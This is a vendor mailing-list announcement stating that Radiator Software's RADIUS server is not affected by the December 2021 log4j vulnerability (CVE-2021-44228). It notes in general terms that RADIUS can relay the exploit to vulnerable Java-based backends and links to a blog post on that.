[RADIATOR-ANNOUNCE] Radiator is not affected by log4j vulnerability
Daniela Loya
dlr at radiatorsoftware.com
Mon Dec 13 10:52:02 UTC 2021
On the 10th of December 2021 a vulnerability (CVE-2021-44228
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) in a popular
Java-based logging utility log4j was published. Since then, we have
received some customer queries about Radiator’s vulnerability.
Radiator does not utilise Java or log4j as a component of our software
and is therefore not vulnerable to the log4j vulnerability.
While closely following the situation, research, and responses around
the vulnerability, we have identified that RADIUS protocol and
infrastructure can be used to deliver the exploit to more vulnerable
services such as Java-based backend services, AAA information sources
and centralised logging systems. We have documented this delivery method
principle into a separate blog post found here:
https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html
We will continue monitoring the issue closely and announce if issues
affecting Radiator or Radiator services are found.
--
Daniela Loya Ramos
Sales, Radiator Software Oy
www.radiatorsoftware.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.open.com.au/pipermail/radiator-announce/attachments/20211213/ec06fa00/attachment.html>
More information about the radiator-announce
mailing list